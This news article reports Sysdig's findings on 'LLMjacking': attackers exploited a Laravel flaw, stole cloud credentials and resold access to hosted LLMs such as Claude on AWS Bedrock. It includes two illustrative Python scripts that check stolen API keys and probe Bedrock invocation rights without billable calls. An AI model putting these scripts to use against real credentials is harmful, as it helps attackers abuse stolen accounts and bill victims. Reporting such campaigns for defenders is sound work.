LLM services are being hit by hackers looking to sell on private info


Using cloud-hosted large language models (LLMs) can be quite expensive, which is why hackers have apparently begun stealing, and selling, login credentials for the tools.
Cybersecurity researchers at the Sysdig Threat Research Team recently spotted one such campaign, dubbing it LLMjacking.
In its report, Sysdig said it observed a threat actor abusing a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. This flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials for LLM services.
New methods of abuse
“Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers,” the researchers explained in the report. “In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted.”
The researchers were able to identify the tools the attackers used to generate the requests that invoked the models. Among them was a Python script that checked credentials for ten AI services, determining which ones were usable. The services included AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.
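The article doesn't publish the script itself, but a credential checker along these lines is straightforward to picture. The sketch below is an assumption of how such a tool might work, not Sysdig's recovered code: it probes each provider with the cheapest authenticated read-only call available (here, each service's documented model-listing endpoint) and reports whether a key authenticates.

```python
# Hypothetical sketch of a multi-provider key checker (not the attackers' actual script).
# Uses each provider's public model-listing route as a cheap validity probe.
import requests

# service name -> (listing URL, function that builds auth headers from a key)
SERVICES = {
    "OpenAI":  ("https://api.openai.com/v1/models",
                lambda key: {"Authorization": f"Bearer {key}"}),
    "Mistral": ("https://api.mistral.ai/v1/models",
                lambda key: {"Authorization": f"Bearer {key}"}),
}

def check_key(service: str, key: str) -> bool:
    """Return True if the key authenticates against the service's model-listing endpoint."""
    url, make_headers = SERVICES[service]
    resp = requests.get(url, headers=make_headers(key), timeout=10)
    return resp.status_code == 200  # 401/403 means the key is invalid or lacks access

if __name__ == "__main__":
    stolen = {"OpenAI": "sk-...", "Mistral": "..."}  # placeholder keys
    for name, key in stolen.items():
        print(name, "valid" if check_key(name, key) else "invalid")
```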
They also discovered that the attackers didn’t run any legitimate LLM queries during the verification stage, instead doing “just enough” to find out what the credentials were capable of and what quotas applied.
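Against AWS Bedrock specifically, a check of that kind doesn't require a real, billable completion. The rough illustration below is our assumption of the approach rather than code from the report: list the foundation models the stolen credentials can see, then send a deliberately malformed InvokeModel request, where a validation error signals "can invoke" and an access-denied error signals "cannot", all without paying for tokens.

```python
# Illustrative sketch: verifying whether stolen AWS credentials can reach Bedrock-hosted
# models without running a real (billable) completion. Not taken from Sysdig's report.
import json
import boto3
from botocore.exceptions import ClientError

session = boto3.Session()  # assumes the stolen access key/secret are set in the environment

# 1. Can the credentials enumerate foundation models at all?
bedrock = session.client("bedrock", region_name="us-east-1")
models = bedrock.list_foundation_models()["modelSummaries"]
print(f"{len(models)} foundation models visible")

# 2. Probe invocation rights with an intentionally invalid body: a ValidationException
#    suggests the key can invoke the model, while AccessDeniedException means it cannot.
runtime = session.client("bedrock-runtime", region_name="us-east-1")
try:
    runtime.invoke_model(
        modelId="anthropic.claude-v2",
        body=json.dumps({"prompt": "", "max_tokens_to_sample": -1}),  # deliberately invalid
        contentType="application/json",
    )
except ClientError as err:
    code = err.response["Error"]["Code"]
    print("invoke allowed (request rejected as invalid)" if code == "ValidationException"
          else f"invoke blocked: {code}")
```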
Reporting on the findings, The Hacker News says they are evidence that hackers are finding new ways to weaponize LLMs beyond the usual prompt injection and model poisoning attacks: monetizing access to the models while the bill gets mailed to the victim.
The bill, the researchers stressed, could be a big one, reaching up to $46,000 a day in LLM usage.
“The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it,” the researchers added. “By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.”